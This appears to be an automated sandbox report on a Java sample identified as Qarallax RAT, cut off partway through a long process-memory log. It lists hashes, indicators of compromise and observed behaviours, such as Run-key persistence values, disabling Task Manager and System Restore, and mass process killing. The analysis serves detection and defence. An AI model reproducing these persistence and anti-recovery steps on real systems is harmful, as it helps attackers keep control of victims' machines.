Analysis
-
max time kernel
63s -
max time network
134s -
platform
windows7_x64 -
resource
win7 -
submitted
19-08-2020 07:21
Static task
static1
Behavioral task
behavioral1
Sample
PI_revisado.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
PI_revisado.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
PI_revisado.jar
-
Size
410KB
-
MD5
0922b16b4e870dcf93bff729f84ad597
-
SHA1
259e5380c4655ce5076a89e1f41c4764c1810825
-
SHA256
a4a5c90b835592cb0ed02f3cdd7697c937c2e86fe204ba1a9f1b3f3c52f57963
-
SHA512
51c05bb76c7217e70dd54711dfdcc23b77eec09a3531d01b49c7f9423a8121848e6430c4f4276f2af62193c6fc64010046cfe3c1b80e7577f4c1e6b76259c8e0
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001352d-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1104 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\ikprqQu = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\TKnJu\\nfOlo.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\TKnJu\Desktop.ini java.exe File created C:\Users\Admin\TKnJu\Desktop.ini java.exe File opened for modification C:\Users\Admin\TKnJu\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\TKnJu\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\pLUGR java.exe File created C:\Windows\System32\pLUGR java.exe -
Kills process with taskkill 19 IoCs
pid Process 1880 taskkill.exe 1360 taskkill.exe 1144 taskkill.exe 616 taskkill.exe 2068 taskkill.exe 2232 taskkill.exe 2288 taskkill.exe 2336 taskkill.exe 2448 taskkill.exe 1528 taskkill.exe 1240 taskkill.exe 1968 taskkill.exe 2392 taskkill.exe 2480 taskkill.exe 1888 taskkill.exe 1544 taskkill.exe 1988 taskkill.exe 540 taskkill.exe 2168 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1540 powershell.exe 1540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 140 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 276 WMIC.exe Token: SeSecurityPrivilege 276 WMIC.exe Token: SeTakeOwnershipPrivilege 276 WMIC.exe Token: SeLoadDriverPrivilege 276 WMIC.exe Token: SeSystemProfilePrivilege 276 WMIC.exe Token: SeSystemtimePrivilege 276 WMIC.exe Token: SeProfSingleProcessPrivilege 276 WMIC.exe Token: SeIncBasePriorityPrivilege 276 WMIC.exe Token: SeCreatePagefilePrivilege 276 WMIC.exe Token: SeBackupPrivilege 276 WMIC.exe Token: SeRestorePrivilege 276 WMIC.exe Token: SeShutdownPrivilege 276 WMIC.exe Token: SeDebugPrivilege 276 WMIC.exe Token: SeSystemEnvironmentPrivilege 276 WMIC.exe Token: SeRemoteShutdownPrivilege 276 WMIC.exe Token: SeUndockPrivilege 276 WMIC.exe Token: SeManageVolumePrivilege 276 WMIC.exe Token: 33 276 WMIC.exe Token: 34 276 WMIC.exe Token: 35 276 WMIC.exe Token: SeIncreaseQuotaPrivilege 276 WMIC.exe Token: SeSecurityPrivilege 276 WMIC.exe Token: SeTakeOwnershipPrivilege 276 WMIC.exe Token: SeLoadDriverPrivilege 276 WMIC.exe Token: SeSystemProfilePrivilege 276 WMIC.exe Token: SeSystemtimePrivilege 276 WMIC.exe Token: SeProfSingleProcessPrivilege 276 WMIC.exe Token: SeIncBasePriorityPrivilege 276 WMIC.exe Token: SeCreatePagefilePrivilege 276 WMIC.exe Token: SeBackupPrivilege 276 WMIC.exe Token: SeRestorePrivilege 276 WMIC.exe Token: SeShutdownPrivilege 276 WMIC.exe Token: SeDebugPrivilege 276 WMIC.exe Token: SeSystemEnvironmentPrivilege 276 WMIC.exe Token: SeRemoteShutdownPrivilege 276 WMIC.exe Token: SeUndockPrivilege 276 WMIC.exe Token: SeManageVolumePrivilege 276 WMIC.exe Token: 33 276 WMIC.exe Token: 34 276 WMIC.exe Token: 35 276 WMIC.exe Token: SeIncreaseQuotaPrivilege 1092 WMIC.exe Token: SeSecurityPrivilege 1092 WMIC.exe Token: SeTakeOwnershipPrivilege 1092 WMIC.exe Token: SeLoadDriverPrivilege 1092 WMIC.exe Token: SeSystemProfilePrivilege 1092 WMIC.exe Token: SeSystemtimePrivilege 1092 WMIC.exe Token: SeProfSingleProcessPrivilege 1092 WMIC.exe Token: SeIncBasePriorityPrivilege 1092 WMIC.exe Token: SeCreatePagefilePrivilege 1092 WMIC.exe Token: SeBackupPrivilege 1092 WMIC.exe Token: SeRestorePrivilege 1092 WMIC.exe Token: SeShutdownPrivilege 1092 WMIC.exe Token: SeDebugPrivilege 1092 WMIC.exe Token: SeSystemEnvironmentPrivilege 1092 WMIC.exe Token: SeRemoteShutdownPrivilege 1092 WMIC.exe Token: SeUndockPrivilege 1092 WMIC.exe Token: SeManageVolumePrivilege 1092 WMIC.exe Token: 33 1092 WMIC.exe Token: 34 1092 WMIC.exe Token: 35 1092 WMIC.exe Token: SeIncreaseQuotaPrivilege 1092 WMIC.exe Token: SeSecurityPrivilege 1092 WMIC.exe Token: SeTakeOwnershipPrivilege 1092 WMIC.exe Token: SeLoadDriverPrivilege 1092 WMIC.exe Token: SeSystemProfilePrivilege 1092 WMIC.exe Token: SeSystemtimePrivilege 1092 WMIC.exe Token: SeProfSingleProcessPrivilege 1092 WMIC.exe Token: SeIncBasePriorityPrivilege 1092 WMIC.exe Token: SeCreatePagefilePrivilege 1092 WMIC.exe Token: SeBackupPrivilege 1092 WMIC.exe Token: SeRestorePrivilege 1092 WMIC.exe Token: SeShutdownPrivilege 1092 WMIC.exe Token: SeDebugPrivilege 1092 WMIC.exe Token: SeSystemEnvironmentPrivilege 1092 WMIC.exe Token: SeRemoteShutdownPrivilege 1092 WMIC.exe Token: SeUndockPrivilege 1092 WMIC.exe Token: SeManageVolumePrivilege 1092 WMIC.exe Token: 33 1092 WMIC.exe Token: 34 1092 WMIC.exe Token: 35 1092 WMIC.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1880 taskkill.exe Token: SeDebugPrivilege 1528 taskkill.exe Token: SeDebugPrivilege 1240 taskkill.exe Token: SeIncreaseQuotaPrivilege 1484 WMIC.exe Token: SeSecurityPrivilege 1484 WMIC.exe Token: SeTakeOwnershipPrivilege 1484 WMIC.exe Token: SeLoadDriverPrivilege 1484 WMIC.exe Token: SeSystemProfilePrivilege 1484 WMIC.exe Token: SeSystemtimePrivilege 1484 WMIC.exe Token: SeProfSingleProcessPrivilege 1484 WMIC.exe Token: SeIncBasePriorityPrivilege 1484 WMIC.exe Token: SeCreatePagefilePrivilege 1484 WMIC.exe Token: SeBackupPrivilege 1484 WMIC.exe Token: SeRestorePrivilege 1484 WMIC.exe Token: SeShutdownPrivilege 1484 WMIC.exe Token: SeDebugPrivilege 1484 WMIC.exe Token: SeSystemEnvironmentPrivilege 1484 WMIC.exe Token: SeRemoteShutdownPrivilege 1484 WMIC.exe Token: SeUndockPrivilege 1484 WMIC.exe Token: SeManageVolumePrivilege 1484 WMIC.exe Token: 33 1484 WMIC.exe Token: 34 1484 WMIC.exe Token: 35 1484 WMIC.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 1544 taskkill.exe Token: SeDebugPrivilege 1968 taskkill.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 540 taskkill.exe Token: SeIncreaseQuotaPrivilege 1484 WMIC.exe Token: SeSecurityPrivilege 1484 WMIC.exe Token: SeTakeOwnershipPrivilege 1484 WMIC.exe Token: SeLoadDriverPrivilege 1484 WMIC.exe Token: SeSystemProfilePrivilege 1484 WMIC.exe Token: SeSystemtimePrivilege 1484 WMIC.exe Token: SeProfSingleProcessPrivilege 1484 WMIC.exe Token: SeIncBasePriorityPrivilege 1484 WMIC.exe Token: SeCreatePagefilePrivilege 1484 WMIC.exe Token: SeBackupPrivilege 1484 WMIC.exe Token: SeRestorePrivilege 1484 WMIC.exe Token: SeShutdownPrivilege 1484 WMIC.exe Token: SeDebugPrivilege 1484 WMIC.exe Token: SeSystemEnvironmentPrivilege 1484 WMIC.exe Token: SeRemoteShutdownPrivilege 1484 WMIC.exe Token: SeUndockPrivilege 1484 WMIC.exe Token: SeManageVolumePrivilege 1484 WMIC.exe Token: 33 1484 WMIC.exe Token: 34 1484 WMIC.exe Token: 35 1484 WMIC.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeDebugPrivilege 2288 taskkill.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeDebugPrivilege 2392 taskkill.exe Token: SeDebugPrivilege 2448 taskkill.exe Token: SeDebugPrivilege 2480 taskkill.exe Token: SeDebugPrivilege 1540 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1104 java.exe -
Suspicious use of WriteProcessMemory 768 IoCs
description pid Process procid_target PID 1104 wrote to memory of 908 1104 java.exe 25 PID 1104 wrote to memory of 908 1104 java.exe 25 PID 1104 wrote to memory of 908 1104 java.exe 25 PID 1104 wrote to memory of 1636 1104 java.exe 26 PID 1104 wrote to memory of 1636 1104 java.exe 26 PID 1104 wrote to memory of 1636 1104 java.exe 26 PID 1636 wrote to memory of 276 1636 cmd.exe 27 PID 1636 wrote to memory of 276 1636 cmd.exe 27 PID 1636 wrote to memory of 276 1636 cmd.exe 27 PID 1104 wrote to memory of 1048 1104 java.exe 28 PID 1104 wrote to memory of 1048 1104 java.exe 28 PID 1104 wrote to memory of 1048 1104 java.exe 28 PID 1048 wrote to memory of 1092 1048 cmd.exe 29 PID 1048 wrote to memory of 1092 1048 cmd.exe 29 PID 1048 wrote to memory of 1092 1048 cmd.exe 29 PID 1104 wrote to memory of 1716 1104 java.exe 30 PID 1104 wrote to memory of 1716 1104 java.exe 30 PID 1104 wrote to memory of 1716 1104 java.exe 30 PID 1104 wrote to memory of 1836 1104 java.exe 31 PID 1104 wrote to memory of 1836 1104 java.exe 31 PID 1104 wrote to memory of 1836 1104 java.exe 31 PID 1104 wrote to memory of 1844 1104 java.exe 32 PID 1104 wrote to memory of 1844 1104 java.exe 32 PID 1104 wrote to memory of 1844 1104 java.exe 32 PID 1104 wrote to memory of 1376 1104 java.exe 33 PID 1104 wrote to memory of 1376 1104 java.exe 33 PID 1104 wrote to memory of 1376 1104 java.exe 33 PID 1104 wrote to memory of 1812 1104 java.exe 34 PID 1104 wrote to memory of 1812 1104 java.exe 34 PID 1104 wrote to memory of 1812 1104 java.exe 34 PID 1104 wrote to memory of 1796 1104 java.exe 35 PID 1104 wrote to memory of 1796 1104 java.exe 35 PID 1104 wrote to memory of 1796 1104 java.exe 35 PID 1104 wrote to memory of 1820 1104 java.exe 36 PID 1104 wrote to memory of 1820 1104 java.exe 36 PID 1104 wrote to memory of 1820 1104 java.exe 36 PID 1104 wrote to memory of 1768 1104 java.exe 37 PID 1104 wrote to memory of 1768 1104 java.exe 37 PID 1104 wrote to memory of 1768 1104 java.exe 37 PID 1104 wrote to memory of 1700 1104 java.exe 38 PID 1104 wrote to memory of 1700 1104 java.exe 38 PID 1104 wrote to memory of 1700 1104 java.exe 38 PID 1104 wrote to memory of 1540 1104 java.exe 39 PID 1104 wrote to memory of 1540 1104 java.exe 39 PID 1104 wrote to memory of 1540 1104 java.exe 39 PID 1104 wrote to memory of 1888 1104 java.exe 40 PID 1104 wrote to memory of 1888 1104 java.exe 40 PID 1104 wrote to memory of 1888 1104 java.exe 40 PID 1104 wrote to memory of 1936 1104 java.exe 41 PID 1104 wrote to memory of 1936 1104 java.exe 41 PID 1104 wrote to memory of 1936 1104 java.exe 41 PID 1104 wrote to memory of 1892 1104 java.exe 42 PID 1104 wrote to memory of 1892 1104 java.exe 42 PID 1104 wrote to memory of 1892 1104 java.exe 42 PID 1700 wrote to memory of 1956 1700 cmd.exe 45 PID 1700 wrote to memory of 1956 1700 cmd.exe 45 PID 1700 wrote to memory of 1956 1700 cmd.exe 45 PID 1104 wrote to memory of 1972 1104 java.exe 46 PID 1104 wrote to memory of 1972 1104 java.exe 46 PID 1104 wrote to memory of 1972 1104 java.exe 46 PID 1104 wrote to memory of 1932 1104 java.exe 48 PID 1104 wrote to memory of 1932 1104 java.exe 48 PID 1104 wrote to memory of 1932 1104 java.exe 48 PID 1700 wrote to memory of 2036 1700 cmd.exe 50 PID 1700 wrote to memory of 2036 1700 cmd.exe 50 PID 1700 wrote to memory of 2036 1700 cmd.exe 50 PID 1104 wrote to memory of 2028 1104 java.exe 51 PID 1104 wrote to memory of 2028 1104 java.exe 51 PID 1104 wrote to memory of 2028 1104 java.exe 51 PID 1104 wrote to memory of 1480 1104 java.exe 54 PID 1104 wrote to memory of 1480 1104 java.exe 54 PID 1104 wrote to memory of 1480 1104 java.exe 54 PID 1104 wrote to memory of 268 1104 java.exe 56 PID 1104 wrote to memory of 268 1104 java.exe 56 PID 1104 wrote to memory of 268 1104 java.exe 56 PID 1104 wrote to memory of 932 1104 java.exe 57 PID 1104 wrote to memory of 932 1104 java.exe 57 PID 1104 wrote to memory of 932 1104 java.exe 57 PID 1104 wrote to memory of 812 1104 java.exe 60 PID 1104 wrote to memory of 812 1104 java.exe 60 PID 1104 wrote to memory of 812 1104 java.exe 60 PID 1104 wrote to memory of 1088 1104 java.exe 61 PID 1104 wrote to memory of 1088 1104 java.exe 61 PID 1104 wrote to memory of 1088 1104 java.exe 61 PID 1104 wrote to memory of 1508 1104 java.exe 63 PID 1104 wrote to memory of 1508 1104 java.exe 63 PID 1104 wrote to memory of 1508 1104 java.exe 63 PID 1104 wrote to memory of 1584 1104 java.exe 65 PID 1104 wrote to memory of 1584 1104 java.exe 65 PID 1104 wrote to memory of 1584 1104 java.exe 65 PID 1104 wrote to memory of 1816 1104 java.exe 67 PID 1104 wrote to memory of 1816 1104 java.exe 67 PID 1104 wrote to memory of 1816 1104 java.exe 67 PID 1088 wrote to memory of 1236 1088 cmd.exe 68 PID 1088 wrote to memory of 1236 1088 cmd.exe 68 PID 1088 wrote to memory of 1236 1088 cmd.exe 68 PID 1104 wrote to memory of 1868 1104 java.exe 69 PID 1104 wrote to memory of 1868 1104 java.exe 69 PID 1104 wrote to memory of 1868 1104 java.exe 69 PID 1104 wrote to memory of 1872 1104 java.exe 72 PID 1104 wrote to memory of 1872 1104 java.exe 72 PID 1104 wrote to memory of 1872 1104 java.exe 72 PID 1104 wrote to memory of 1880 1104 java.exe 73 PID 1104 wrote to memory of 1880 1104 java.exe 73 PID 1104 wrote to memory of 1880 1104 java.exe 73 PID 1104 wrote to memory of 1964 1104 java.exe 75 PID 1104 wrote to memory of 1964 1104 java.exe 75 PID 1104 wrote to memory of 1964 1104 java.exe 75 PID 1104 wrote to memory of 1996 1104 java.exe 77 PID 1104 wrote to memory of 1996 1104 java.exe 77 PID 1104 wrote to memory of 1996 1104 java.exe 77 PID 1088 wrote to memory of 1960 1088 cmd.exe 78 PID 1088 wrote to memory of 1960 1088 cmd.exe 78 PID 1088 wrote to memory of 1960 1088 cmd.exe 78 PID 1104 wrote to memory of 1936 1104 java.exe 81 PID 1104 wrote to memory of 1936 1104 java.exe 81 PID 1104 wrote to memory of 1936 1104 java.exe 81 PID 1104 wrote to memory of 1672 1104 java.exe 82 PID 1104 wrote to memory of 1672 1104 java.exe 82 PID 1104 wrote to memory of 1672 1104 java.exe 82 PID 1104 wrote to memory of 1528 1104 java.exe 83 PID 1104 wrote to memory of 1528 1104 java.exe 83 PID 1104 wrote to memory of 1528 1104 java.exe 83 PID 1104 wrote to memory of 1716 1104 java.exe 86 PID 1104 wrote to memory of 1716 1104 java.exe 86 PID 1104 wrote to memory of 1716 1104 java.exe 86 PID 1104 wrote to memory of 1828 1104 java.exe 89 PID 1104 wrote to memory of 1828 1104 java.exe 89 PID 1104 wrote to memory of 1828 1104 java.exe 89 PID 1104 wrote to memory of 1240 1104 java.exe 92 PID 1104 wrote to memory of 1240 1104 java.exe 92 PID 1104 wrote to memory of 1240 1104 java.exe 92 PID 1104 wrote to memory of 1072 1104 java.exe 94 PID 1104 wrote to memory of 1072 1104 java.exe 94 PID 1104 wrote to memory of 1072 1104 java.exe 94 PID 1104 wrote to memory of 1360 1104 java.exe 95 PID 1104 wrote to memory of 1360 1104 java.exe 95 PID 1104 wrote to memory of 1360 1104 java.exe 95 PID 1072 wrote to memory of 1484 1072 cmd.exe 96 PID 1072 wrote to memory of 1484 1072 cmd.exe 96 PID 1072 wrote to memory of 1484 1072 cmd.exe 96 PID 1104 wrote to memory of 1144 1104 java.exe 98 PID 1104 wrote to memory of 1144 1104 java.exe 98 PID 1104 wrote to memory of 1144 1104 java.exe 98 PID 1104 wrote to memory of 1544 1104 java.exe 100 PID 1104 wrote to memory of 1544 1104 java.exe 100 PID 1104 wrote to memory of 1544 1104 java.exe 100 PID 1104 wrote to memory of 1968 1104 java.exe 102 PID 1104 wrote to memory of 1968 1104 java.exe 102 PID 1104 wrote to memory of 1968 1104 java.exe 102 PID 1104 wrote to memory of 1988 1104 java.exe 104 PID 1104 wrote to memory of 1988 1104 java.exe 104 PID 1104 wrote to memory of 1988 1104 java.exe 104 PID 1104 wrote to memory of 616 1104 java.exe 106 PID 1104 wrote to memory of 616 1104 java.exe 106 PID 1104 wrote to memory of 616 1104 java.exe 106 PID 1104 wrote to memory of 540 1104 java.exe 108 PID 1104 wrote to memory of 540 1104 java.exe 108 PID 1104 wrote to memory of 540 1104 java.exe 108 PID 1104 wrote to memory of 2068 1104 java.exe 110 PID 1104 wrote to memory of 2068 1104 java.exe 110 PID 1104 wrote to memory of 2068 1104 java.exe 110 PID 1104 wrote to memory of 2168 1104 java.exe 112 PID 1104 wrote to memory of 2168 1104 java.exe 112 PID 1104 wrote to memory of 2168 1104 java.exe 112 PID 1104 wrote to memory of 2232 1104 java.exe 114 PID 1104 wrote to memory of 2232 1104 java.exe 114 PID 1104 wrote to memory of 2232 1104 java.exe 114 PID 1104 wrote to memory of 2288 1104 java.exe 116 PID 1104 wrote to memory of 2288 1104 java.exe 116 PID 1104 wrote to memory of 2288 1104 java.exe 116 PID 1104 wrote to memory of 2336 1104 java.exe 118 PID 1104 wrote to memory of 2336 1104 java.exe 118 PID 1104 wrote to memory of 2336 1104 java.exe 118 PID 1104 wrote to memory of 2392 1104 java.exe 120 PID 1104 wrote to memory of 2392 1104 java.exe 120 PID 1104 wrote to memory of 2392 1104 java.exe 120 PID 1104 wrote to memory of 2448 1104 java.exe 122 PID 1104 wrote to memory of 2448 1104 java.exe 122 PID 1104 wrote to memory of 2448 1104 java.exe 122 PID 1104 wrote to memory of 2480 1104 java.exe 124 PID 1104 wrote to memory of 2480 1104 java.exe 124 PID 1104 wrote to memory of 2480 1104 java.exe 124 PID 1104 wrote to memory of 2516 1104 java.exe 126 PID 1104 wrote to memory of 2516 1104 java.exe 126 PID 1104 wrote to memory of 2516 1104 java.exe 126 PID 2516 wrote to memory of 2528 2516 cmd.exe 127 PID 2516 wrote to memory of 2528 2516 cmd.exe 127 PID 2516 wrote to memory of 2528 2516 cmd.exe 127 PID 2516 wrote to memory of 2544 2516 cmd.exe 128 PID 2516 wrote to memory of 2544 2516 cmd.exe 128 PID 2516 wrote to memory of 2544 2516 cmd.exe 128 PID 1104 wrote to memory of 2556 1104 java.exe 129 PID 1104 wrote to memory of 2556 1104 java.exe 129 PID 1104 wrote to memory of 2556 1104 java.exe 129 PID 2556 wrote to memory of 2568 2556 cmd.exe 130 PID 2556 wrote to memory of 2568 2556 cmd.exe 130 PID 2556 wrote to memory of 2568 2556 cmd.exe 130 PID 2556 wrote to memory of 2580 2556 cmd.exe 131 PID 2556 wrote to memory of 2580 2556 cmd.exe 131 PID 2556 wrote to memory of 2580 2556 cmd.exe 131 PID 1104 wrote to memory of 2596 1104 java.exe 132 PID 1104 wrote to memory of 2596 1104 java.exe 132 PID 1104 wrote to memory of 2596 1104 java.exe 132 PID 2596 wrote to memory of 2608 2596 cmd.exe 133 PID 2596 wrote to memory of 2608 2596 cmd.exe 133 PID 2596 wrote to memory of 2608 2596 cmd.exe 133 PID 2596 wrote to memory of 2620 2596 cmd.exe 134 PID 2596 wrote to memory of 2620 2596 cmd.exe 134 PID 2596 wrote to memory of 2620 2596 cmd.exe 134 PID 1104 wrote to memory of 2632 1104 java.exe 135 PID 1104 wrote to memory of 2632 1104 java.exe 135 PID 1104 wrote to memory of 2632 1104 java.exe 135 PID 2632 wrote to memory of 2648 2632 cmd.exe 136 PID 2632 wrote to memory of 2648 2632 cmd.exe 136 PID 2632 wrote to memory of 2648 2632 cmd.exe 136 PID 2632 wrote to memory of 2660 2632 cmd.exe 137 PID 2632 wrote to memory of 2660 2632 cmd.exe 137 PID 2632 wrote to memory of 2660 2632 cmd.exe 137 PID 1104 wrote to memory of 2676 1104 java.exe 138 PID 1104 wrote to memory of 2676 1104 java.exe 138 PID 1104 wrote to memory of 2676 1104 java.exe 138 PID 2676 wrote to memory of 2688 2676 cmd.exe 139 PID 2676 wrote to memory of 2688 2676 cmd.exe 139 PID 2676 wrote to memory of 2688 2676 cmd.exe 139 PID 2676 wrote to memory of 2704 2676 cmd.exe 140 PID 2676 wrote to memory of 2704 2676 cmd.exe 140 PID 2676 wrote to memory of 2704 2676 cmd.exe 140 PID 1104 wrote to memory of 2716 1104 java.exe 141 PID 1104 wrote to memory of 2716 1104 java.exe 141 PID 1104 wrote to memory of 2716 1104 java.exe 141 PID 2716 wrote to memory of 2732 2716 cmd.exe 142 PID 2716 wrote to memory of 2732 2716 cmd.exe 142 PID 2716 wrote to memory of 2732 2716 cmd.exe 142 PID 2716 wrote to memory of 2744 2716 cmd.exe 143 PID 2716 wrote to memory of 2744 2716 cmd.exe 143 PID 2716 wrote to memory of 2744 2716 cmd.exe 143 PID 1104 wrote to memory of 2760 1104 java.exe 144 PID 1104 wrote to memory of 2760 1104 java.exe 144 PID 1104 wrote to memory of 2760 1104 java.exe 144 PID 2760 wrote to memory of 2772 2760 cmd.exe 145 PID 2760 wrote to memory of 2772 2760 cmd.exe 145 PID 2760 wrote to memory of 2772 2760 cmd.exe 145 PID 2760 wrote to memory of 2788 2760 cmd.exe 146 PID 2760 wrote to memory of 2788 2760 cmd.exe 146 PID 2760 wrote to memory of 2788 2760 cmd.exe 146 PID 1104 wrote to memory of 2800 1104 java.exe 147 PID 1104 wrote to memory of 2800 1104 java.exe 147 PID 1104 wrote to memory of 2800 1104 java.exe 147 PID 2800 wrote to memory of 2812 2800 cmd.exe 148 PID 2800 wrote to memory of 2812 2800 cmd.exe 148 PID 2800 wrote to memory of 2812 2800 cmd.exe 148 PID 2800 wrote to memory of 2832 2800 cmd.exe 149 PID 2800 wrote to memory of 2832 2800 cmd.exe 149 PID 2800 wrote to memory of 2832 2800 cmd.exe 149 PID 1104 wrote to memory of 2864 1104 java.exe 150 PID 1104 wrote to memory of 2864 1104 java.exe 150 PID 1104 wrote to memory of 2864 1104 java.exe 150 PID 2864 wrote to memory of 2892 2864 cmd.exe 151 PID 2864 wrote to memory of 2892 2864 cmd.exe 151 PID 2864 wrote to memory of 2892 2864 cmd.exe 151 PID 2864 wrote to memory of 2904 2864 cmd.exe 152 PID 2864 wrote to memory of 2904 2864 cmd.exe 152 PID 2864 wrote to memory of 2904 2864 cmd.exe 152 PID 1104 wrote to memory of 2916 1104 java.exe 153 PID 1104 wrote to memory of 2916 1104 java.exe 153 PID 1104 wrote to memory of 2916 1104 java.exe 153 PID 2916 wrote to memory of 2928 2916 cmd.exe 154 PID 2916 wrote to memory of 2928 2916 cmd.exe 154 PID 2916 wrote to memory of 2928 2916 cmd.exe 154 PID 2916 wrote to memory of 2948 2916 cmd.exe 155 PID 2916 wrote to memory of 2948 2916 cmd.exe 155 PID 2916 wrote to memory of 2948 2916 cmd.exe 155 PID 1104 wrote to memory of 2960 1104 java.exe 156 PID 1104 wrote to memory of 2960 1104 java.exe 156 PID 1104 wrote to memory of 2960 1104 java.exe 156 PID 2960 wrote to memory of 2972 2960 cmd.exe 157 PID 2960 wrote to memory of 2972 2960 cmd.exe 157 PID 2960 wrote to memory of 2972 2960 cmd.exe 157 PID 2960 wrote to memory of 2984 2960 cmd.exe 158 PID 2960 wrote to memory of 2984 2960 cmd.exe 158 PID 2960 wrote to memory of 2984 2960 cmd.exe 158 PID 1104 wrote to memory of 2996 1104 java.exe 159 PID 1104 wrote to memory of 2996 1104 java.exe 159 PID 1104 wrote to memory of 2996 1104 java.exe 159 PID 2996 wrote to memory of 3016 2996 cmd.exe 160 PID 2996 wrote to memory of 3016 2996 cmd.exe 160 PID 2996 wrote to memory of 3016 2996 cmd.exe 160 PID 2996 wrote to memory of 3032 2996 cmd.exe 161 PID 2996 wrote to memory of 3032 2996 cmd.exe 161 PID 2996 wrote to memory of 3032 2996 cmd.exe 161 PID 1104 wrote to memory of 3044 1104 java.exe 162 PID 1104 wrote to memory of 3044 1104 java.exe 162 PID 1104 wrote to memory of 3044 1104 java.exe 162 PID 3044 wrote to memory of 3060 3044 cmd.exe 163 PID 3044 wrote to memory of 3060 3044 cmd.exe 163 PID 3044 wrote to memory of 3060 3044 cmd.exe 163 PID 3044 wrote to memory of 1716 3044 cmd.exe 164 PID 3044 wrote to memory of 1716 3044 cmd.exe 164 PID 3044 wrote to memory of 1716 3044 cmd.exe 164 PID 1104 wrote to memory of 344 1104 java.exe 165 PID 1104 wrote to memory of 344 1104 java.exe 165 PID 1104 wrote to memory of 344 1104 java.exe 165 PID 344 wrote to memory of 2256 344 cmd.exe 166 PID 344 wrote to memory of 2256 344 cmd.exe 166 PID 344 wrote to memory of 2256 344 cmd.exe 166 PID 344 wrote to memory of 976 344 cmd.exe 167 PID 344 wrote to memory of 976 344 cmd.exe 167 PID 344 wrote to memory of 976 344 cmd.exe 167 PID 1104 wrote to memory of 1980 1104 java.exe 168 PID 1104 wrote to memory of 1980 1104 java.exe 168 PID 1104 wrote to memory of 1980 1104 java.exe 168 PID 1980 wrote to memory of 2016 1980 cmd.exe 169 PID 1980 wrote to memory of 2016 1980 cmd.exe 169 PID 1980 wrote to memory of 2016 1980 cmd.exe 169 PID 1980 wrote to memory of 2044 1980 cmd.exe 170 PID 1980 wrote to memory of 2044 1980 cmd.exe 170 PID 1980 wrote to memory of 2044 1980 cmd.exe 170 PID 1104 wrote to memory of 568 1104 java.exe 171 PID 1104 wrote to memory of 568 1104 java.exe 171 PID 1104 wrote to memory of 568 1104 java.exe 171 PID 568 wrote to memory of 2368 568 cmd.exe 172 PID 568 wrote to memory of 2368 568 cmd.exe 172 PID 568 wrote to memory of 2368 568 cmd.exe 172 PID 568 wrote to memory of 276 568 cmd.exe 173 PID 568 wrote to memory of 276 568 cmd.exe 173 PID 568 wrote to memory of 276 568 cmd.exe 173 PID 1104 wrote to memory of 1052 1104 java.exe 174 PID 1104 wrote to memory of 1052 1104 java.exe 174 PID 1104 wrote to memory of 1052 1104 java.exe 174 PID 1052 wrote to memory of 2344 1052 cmd.exe 175 PID 1052 wrote to memory of 2344 1052 cmd.exe 175 PID 1052 wrote to memory of 2344 1052 cmd.exe 175 PID 1052 wrote to memory of 1604 1052 cmd.exe 176 PID 1052 wrote to memory of 1604 1052 cmd.exe 176 PID 1052 wrote to memory of 1604 1052 cmd.exe 176 PID 1104 wrote to memory of 1492 1104 java.exe 177 PID 1104 wrote to memory of 1492 1104 java.exe 177 PID 1104 wrote to memory of 1492 1104 java.exe 177 PID 1492 wrote to memory of 2428 1492 cmd.exe 178 PID 1492 wrote to memory of 2428 1492 cmd.exe 178 PID 1492 wrote to memory of 2428 1492 cmd.exe 178 PID 1492 wrote to memory of 2004 1492 cmd.exe 179 PID 1492 wrote to memory of 2004 1492 cmd.exe 179 PID 1492 wrote to memory of 2004 1492 cmd.exe 179 PID 1104 wrote to memory of 1984 1104 java.exe 180 PID 1104 wrote to memory of 1984 1104 java.exe 180 PID 1104 wrote to memory of 1984 1104 java.exe 180 PID 1984 wrote to memory of 1544 1984 cmd.exe 181 PID 1984 wrote to memory of 1544 1984 cmd.exe 181 PID 1984 wrote to memory of 1544 1984 cmd.exe 181 PID 1984 wrote to memory of 828 1984 cmd.exe 182 PID 1984 wrote to memory of 828 1984 cmd.exe 182 PID 1984 wrote to memory of 828 1984 cmd.exe 182 PID 1104 wrote to memory of 108 1104 java.exe 183 PID 1104 wrote to memory of 108 1104 java.exe 183 PID 1104 wrote to memory of 108 1104 java.exe 183 PID 108 wrote to memory of 1584 108 cmd.exe 184 PID 108 